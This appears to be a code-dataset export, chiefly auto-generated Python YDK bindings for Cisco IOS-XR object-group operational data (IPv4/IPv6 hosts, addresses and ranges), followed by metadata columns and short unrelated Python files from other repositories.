super(ObjectGroup.Network.Ipv6.Objects.Object.Hosts, self).__init__()
self.yang_name = "hosts"
self.yang_parent_name = "object"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("host", ("host", ObjectGroup.Network.Ipv6.Objects.Object.Hosts.Host))])
self._leafs = OrderedDict()
self.host = YList(self)
self._segment_path = lambda: "hosts"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Network.Ipv6.Objects.Object.Hosts, [], name, value)
class Host(_Entity_):
"""
A single host address
.. attribute:: host_address (key)
host ipv6 address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: host_address_xr
Host address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup.Network.Ipv6.Objects.Object.Hosts.Host, self).__init__()
self.yang_name = "host"
self.yang_parent_name = "hosts"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['host_address']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('host_address', (YLeaf(YType.str, 'host-address'), ['str'])),
('host_address_xr', (YLeaf(YType.str, 'host-address-xr'), ['str'])),
])
self.host_address = None
self.host_address_xr = None
self._segment_path = lambda: "host" + "[host-address='" + str(self.host_address) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Network.Ipv6.Objects.Object.Hosts.Host, ['host_address', 'host_address_xr'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Network.Ipv6.Objects.Object.Hosts.Host']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Network.Ipv6.Objects.Object.Hosts']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Network.Ipv6.Objects.Object']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Network.Ipv6.Objects']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Network.Ipv6']['meta_info']
class Ipv4(_Entity_):
"""
IPv4 object group
.. attribute:: objects
Table of Object
**type**\: :py:class:`Objects <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv4.Objects>`
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup.Network.Ipv4, self).__init__()
self.yang_name = "ipv4"
self.yang_parent_name = "network"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("objects", ("objects", ObjectGroup.Network.Ipv4.Objects))])
self._leafs = OrderedDict()
self.objects = ObjectGroup.Network.Ipv4.Objects()
self.objects.parent = self
self._children_name_map["objects"] = "objects"
self._segment_path = lambda: "ipv4"
self._absolute_path = lambda: "Cisco-IOS-XR-infra-objmgr-oper:object-group/network/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Network.Ipv4, [], name, value)
class Objects(_Entity_):
"""
Table of Object
.. attribute:: object
IPv4 object group
**type**\: list of :py:class:`Object <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv4.Objects.Object>`
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup.Network.Ipv4.Objects, self).__init__()
self.yang_name = "objects"
self.yang_parent_name = "ipv4"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("object", ("object", ObjectGroup.Network.Ipv4.Objects.Object))])
self._leafs = OrderedDict()
self.object = YList(self)
self._segment_path = lambda: "objects"
self._absolute_path = lambda: "Cisco-IOS-XR-infra-objmgr-oper:object-group/network/ipv4/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Network.Ipv4.Objects, [], name, value)
class Object(_Entity_):
"""
IPv4 object group
.. attribute:: object_name (key)
IPv4 object group name \- maximum 64 characters
**type**\: str
**length:** 1..64
**config**\: False
.. attribute:: nested_groups
Table of NestedGroup
**type**\: :py:class:`NestedGroups <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv4.Objects.Object.NestedGroups>`
**config**\: False
.. attribute:: addresses
Table of Address
**type**\: :py:class:`Addresses <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv4.Objects.Object.Addresses>`
**config**\: False
.. attribute:: address_ranges
Table of AddressRange
**type**\: :py:class:`AddressRanges <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv4.Objects.Object.AddressRanges>`
**config**\: False
.. attribute:: parent_groups
Table of parent object group
**type**\: :py:class:`ParentGroups <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv4.Objects.Object.ParentGroups>`
**config**\: False
.. attribute:: hosts
Table of Host
**type**\: :py:class:`Hosts <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv4.Objects.Object.Hosts>`
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup.Network.Ipv4.Objects.Object, self).__init__()
self.yang_name = "object"
self.yang_parent_name = "objects"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['object_name']
self._child_classes = OrderedDict([("nested-groups", ("nested_groups", ObjectGroup.Network.Ipv4.Objects.Object.NestedGroups)), ("addresses", ("addresses", ObjectGroup.Network.Ipv4.Objects.Object.Addresses)), ("address-ranges", ("address_ranges", ObjectGroup.Network.Ipv4.Objects.Object.AddressRanges)), ("parent-groups", ("parent_groups", ObjectGroup.Network.Ipv4.Objects.Object.ParentGroups)), ("hosts", ("hosts", ObjectGroup.Network.Ipv4.Objects.Object.Hosts))])
self._leafs = OrderedDict([
('object_name', (YLeaf(YType.str, 'object-name'), ['str'])),
])
self.object_name = None
self.nested_groups = ObjectGroup.Network.Ipv4.Objects.Object.NestedGroups()
self.nested_groups.parent = self
self._children_name_map["nested_groups"] = "nested-groups"
self.addresses = ObjectGroup.Network.Ipv4.Objects.Object.Addresses()
self.addresses.parent = self
self._children_name_map["addresses"] = "addresses"
self.address_ranges = ObjectGroup.Network.Ipv4.Objects.Object.AddressRanges()
self.address_ranges.parent = self
self._children_name_map["address_ranges"] = "address-ranges"
self.parent_groups = ObjectGroup.Network.Ipv4.Objects.Object.ParentGroups()
self.parent_groups.parent = self
self._children_name_map["parent_groups"] = "parent-groups"
self.hosts = ObjectGroup.Network.Ipv4.Objects.Object.Hosts()
self.hosts.parent = self
self._children_name_map["hosts"] = "hosts"
self._segment_path = lambda: "object" + "[object-name='" + str(self.object_name) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-infra-objmgr-oper:object-group/network/ipv4/objects/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Network.Ipv4.Objects.Object, ['object_name'], name, value)
class NestedGroups(_Entity_):
"""
Table of NestedGroup
.. attribute:: nested_group
Nested object group
**type**\: list of :py:class:`NestedGroup <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv4.Objects.Object.NestedGroups.NestedGroup>`
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup.Network.Ipv4.Objects.Object.NestedGroups, self).__init__()
self.yang_name = "nested-groups"
self.yang_parent_name = "object"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("nested-group", ("nested_group", ObjectGroup.Network.Ipv4.Objects.Object.NestedGroups.NestedGroup))])
self._leafs = OrderedDict()
self.nested_group = YList(self)
self._segment_path = lambda: "nested-groups"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Network.Ipv4.Objects.Object.NestedGroups, [], name, value)
class NestedGroup(_Entity_):
"""
Nested object group
.. attribute:: nested_group_name (key)
Nested object group
**type**\: str
**length:** 1..64
**config**\: False
.. attribute:: nested_group_name_xr
Nested group
**type**\: str
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup.Network.Ipv4.Objects.Object.NestedGroups.NestedGroup, self).__init__()
self.yang_name = "nested-group"
self.yang_parent_name = "nested-groups"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['nested_group_name']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('nested_group_name', (YLeaf(YType.str, 'nested-group-name'), ['str'])),
('nested_group_name_xr', (YLeaf(YType.str, 'nested-group-name-xr'), ['str'])),
])
self.nested_group_name = None
self.nested_group_name_xr = None
self._segment_path = lambda: "nested-group" + "[nested-group-name='" + str(self.nested_group_name) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Network.Ipv4.Objects.Object.NestedGroups.NestedGroup, ['nested_group_name', 'nested_group_name_xr'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Network.Ipv4.Objects.Object.NestedGroups.NestedGroup']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Network.Ipv4.Objects.Object.NestedGroups']['meta_info']
class Addresses(_Entity_):
"""
Table of Address
.. attribute:: address
IPv4 address
**type**\: list of :py:class:`Address <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv4.Objects.Object.Addresses.Address>`
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup.Network.Ipv4.Objects.Object.Addresses, self).__init__()
self.yang_name = "addresses"
self.yang_parent_name = "object"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("address", ("address", ObjectGroup.Network.Ipv4.Objects.Object.Addresses.Address))])
self._leafs = OrderedDict()
self.address = YList(self)
self._segment_path = lambda: "addresses"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Network.Ipv4.Objects.Object.Addresses, [], name, value)
class Address(_Entity_):
"""
IPv4 address
.. attribute:: prefix
IPv4 address/prefix
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: prefix_length
Prefix of the IP Address
**type**\: int
**range:** 0..32
**config**\: False
.. attribute:: prefix_xr
IPv4 Address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: prefix_length_xr
Prefix length
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup.Network.Ipv4.Objects.Object.Addresses.Address, self).__init__()
self.yang_name = "address"
self.yang_parent_name = "addresses"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
('prefix_length', (YLeaf(YType.uint8, 'prefix-length'), ['int'])),
('prefix_xr', (YLeaf(YType.str, 'prefix-xr'), ['str'])),
('prefix_length_xr', (YLeaf(YType.uint32, 'prefix-length-xr'), ['int'])),
])
self.prefix = None
self.prefix_length = None
self.prefix_xr = None
self.prefix_length_xr = None
self._segment_path = lambda: "address"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Network.Ipv4.Objects.Object.Addresses.Address, ['prefix', 'prefix_length', 'prefix_xr', 'prefix_length_xr'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Network.Ipv4.Objects.Object.Addresses.Address']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Network.Ipv4.Objects.Object.Addresses']['meta_info']
class AddressRanges(_Entity_):
"""
Table of AddressRange
.. attribute:: address_range
Range of host addresses
**type**\: list of :py:class:`AddressRange <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv4.Objects.Object.AddressRanges.AddressRange>`
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup.Network.Ipv4.Objects.Object.AddressRanges, self).__init__()
self.yang_name = "address-ranges"
self.yang_parent_name = "object"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("address-range", ("address_range", ObjectGroup.Network.Ipv4.Objects.Object.AddressRanges.AddressRange))])
self._leafs = OrderedDict()
self.address_range = YList(self)
self._segment_path = lambda: "address-ranges"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Network.Ipv4.Objects.Object.AddressRanges, [], name, value)
class AddressRange(_Entity_):
"""
Range of host addresses
.. attribute:: start_address
IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: end_address
IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: start_address_xr
Range start address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: end_address_xr
Range end address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup.Network.Ipv4.Objects.Object.AddressRanges.AddressRange, self).__init__()
self.yang_name = "address-range"
self.yang_parent_name = "address-ranges"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('start_address', (YLeaf(YType.str, 'start-address'), ['str'])),
('end_address', (YLeaf(YType.str, 'end-address'), ['str'])),
('start_address_xr', (YLeaf(YType.str, 'start-address-xr'), ['str'])),
('end_address_xr', (YLeaf(YType.str, 'end-address-xr'), ['str'])),
])
self.start_address = None
self.end_address = None
self.start_address_xr = None
self.end_address_xr = None
self._segment_path = lambda: "address-range"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Network.Ipv4.Objects.Object.AddressRanges.AddressRange, ['start_address', 'end_address', 'start_address_xr', 'end_address_xr'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Network.Ipv4.Objects.Object.AddressRanges.AddressRange']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Network.Ipv4.Objects.Object.AddressRanges']['meta_info']
class ParentGroups(_Entity_):
"""
Table of parent object group
.. attribute:: parent_group
Parent object group
**type**\: list of :py:class:`ParentGroup <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv4.Objects.Object.ParentGroups.ParentGroup>`
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup.Network.Ipv4.Objects.Object.ParentGroups, self).__init__()
self.yang_name = "parent-groups"
self.yang_parent_name = "object"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("parent-group", ("parent_group", ObjectGroup.Network.Ipv4.Objects.Object.ParentGroups.ParentGroup))])
self._leafs = OrderedDict()
self.parent_group = YList(self)
self._segment_path = lambda: "parent-groups"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Network.Ipv4.Objects.Object.ParentGroups, [], name, value)
class ParentGroup(_Entity_):
"""
Parent object group
.. attribute:: parent_group_name (key)
Nested object group
**type**\: str
**length:** 1..64
**config**\: False
.. attribute:: parent_name
Parent node
**type**\: str
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup.Network.Ipv4.Objects.Object.ParentGroups.ParentGroup, self).__init__()
self.yang_name = "parent-group"
self.yang_parent_name = "parent-groups"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['parent_group_name']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('parent_group_name', (YLeaf(YType.str, 'parent-group-name'), ['str'])),
('parent_name', (YLeaf(YType.str, 'parent-name'), ['str'])),
])
self.parent_group_name = None
self.parent_name = None
self._segment_path = lambda: "parent-group" + "[parent-group-name='" + str(self.parent_group_name) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Network.Ipv4.Objects.Object.ParentGroups.ParentGroup, ['parent_group_name', 'parent_name'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Network.Ipv4.Objects.Object.ParentGroups.ParentGroup']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Network.Ipv4.Objects.Object.ParentGroups']['meta_info']
class Hosts(_Entity_):
"""
Table of Host
.. attribute:: host
A single host address
**type**\: list of :py:class:`Host <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv4.Objects.Object.Hosts.Host>`
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup.Network.Ipv4.Objects.Object.Hosts, self).__init__()
self.yang_name = "hosts"
self.yang_parent_name = "object"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("host", ("host", ObjectGroup.Network.Ipv4.Objects.Object.Hosts.Host))])
self._leafs = OrderedDict()
self.host = YList(self)
self._segment_path = lambda: "hosts"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Network.Ipv4.Objects.Object.Hosts, [], name, value)
class Host(_Entity_):
"""
A single host address
.. attribute:: host_address (key)
Host ipv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: host_address_xr
Host address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup.Network.Ipv4.Objects.Object.Hosts.Host, self).__init__()
self.yang_name = "host"
self.yang_parent_name = "hosts"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['host_address']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('host_address', (YLeaf(YType.str, 'host-address'), ['str'])),
('host_address_xr', (YLeaf(YType.str, 'host-address-xr'), ['str'])),
])
self.host_address = None
self.host_address_xr = None
self._segment_path = lambda: "host" + "[host-address='" + str(self.host_address) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Network.Ipv4.Objects.Object.Hosts.Host, ['host_address', 'host_address_xr'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Network.Ipv4.Objects.Object.Hosts.Host']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Network.Ipv4.Objects.Object.Hosts']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Network.Ipv4.Objects.Object']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Network.Ipv4.Objects']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Network.Ipv4']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Network']['meta_info']
def clone_ptr(self):
self._top_entity = ObjectGroup()
return self._top_entity
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup']['meta_info']
| 40.301456
| 488
| 0.437668
| 10,650
| 121,791
| 4.723099
| 0.029296
| 0.030536
| 0.03817
| 0.030715
| 0.944415
| 0.932049
| 0.917954
| 0.904932
| 0.889525
| 0.884038
| 0
| 0.033118
| 0.453827
| 121,791
| 3,021
| 489
| 40.314796
| 0.723072
| 0.201329
| 0
| 0.790717
| 0
| 0.004072
| 0.112477
| 0.032497
| 0
| 0
| 0
| 0
| 0
| 1
| 0.099349
| false
| 0
| 0.041531
| 0
| 0.299674
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
075cfb092c585adc98ff2da4ee61baf23289dea2
| 134
|
py
|
Python
|
nami/datasets/__init__.py
|
namirinz/nami
|
b74b3d302aa241470ce6ae210c5a2f0e09dd8bf2
|
[
"MIT"
] | 2
|
2020-08-03T10:37:45.000Z
|
2020-10-11T14:55:05.000Z
|
nami/datasets/__init__.py
|
namirinz/nami
|
b74b3d302aa241470ce6ae210c5a2f0e09dd8bf2
|
[
"MIT"
] | null | null | null |
nami/datasets/__init__.py
|
namirinz/nami
|
b74b3d302aa241470ce6ae210c5a2f0e09dd8bf2
|
[
"MIT"
] | null | null | null |
from nami.datasets.ImageNet import get_nounids
from nami.datasets.ImageNet import get_dataset
from nami.datasets.kme import load_data
| 33.5
| 46
| 0.865672
| 21
| 134
| 5.380952
| 0.52381
| 0.212389
| 0.424779
| 0.424779
| 0.584071
| 0.584071
| 0
| 0
| 0
| 0
| 0
| 0
| 0.089552
| 134
| 3
| 47
| 44.666667
| 0.92623
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
ab1f83113bd231ecbf2157f70e17c31981fa8fde
| 40
|
py
|
Python
|
base_session_store_psql/__init__.py
|
agenterpgmbh/misc-addons
|
27e36d119b1e73089a2ebfcd8d4cfc706c8f1f41
|
[
"MIT"
] | null | null | null |
base_session_store_psql/__init__.py
|
agenterpgmbh/misc-addons
|
27e36d119b1e73089a2ebfcd8d4cfc706c8f1f41
|
[
"MIT"
] | 1
|
2020-05-03T04:27:29.000Z
|
2020-05-03T04:27:29.000Z
|
base_session_store_psql/__init__.py
|
eneldoserrata/misc-addons
|
6f3b94d8a71d603d9ad449f96edfc66385e78080
|
[
"MIT"
] | 2
|
2020-05-09T02:08:59.000Z
|
2022-03-21T06:37:15.000Z
|
def post_load():
from . import http
| 13.333333
| 22
| 0.65
| 6
| 40
| 4.166667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 40
| 2
| 23
| 20
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0.5
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ab246271c210490a762ddc4ad1285a316ca2ba1f
| 6,371
|
py
|
Python
|
dbbackup/tests/functional/test_commands.py
|
amolinaalvarez/django-dbbackup
|
9316ed14d3b4be18662fa5fd24f124a5d6014c8e
|
[
"BSD-3-Clause"
] | null | null | null |
dbbackup/tests/functional/test_commands.py
|
amolinaalvarez/django-dbbackup
|
9316ed14d3b4be18662fa5fd24f124a5d6014c8e
|
[
"BSD-3-Clause"
] | null | null | null |
dbbackup/tests/functional/test_commands.py
|
amolinaalvarez/django-dbbackup
|
9316ed14d3b4be18662fa5fd24f124a5d6014c8e
|
[
"BSD-3-Clause"
] | 1
|
2018-10-08T20:37:35.000Z
|
2018-10-08T20:37:35.000Z
|
from mock import patch
from django.test import TransactionTestCase as TestCase
from django.core.management import execute_from_command_line
from dbbackup.tests.utils import (TEST_DATABASE, HANDLED_FILES,
clean_gpg_keys, add_public_gpg,
add_private_gpg, get_dump,
get_dump_name)
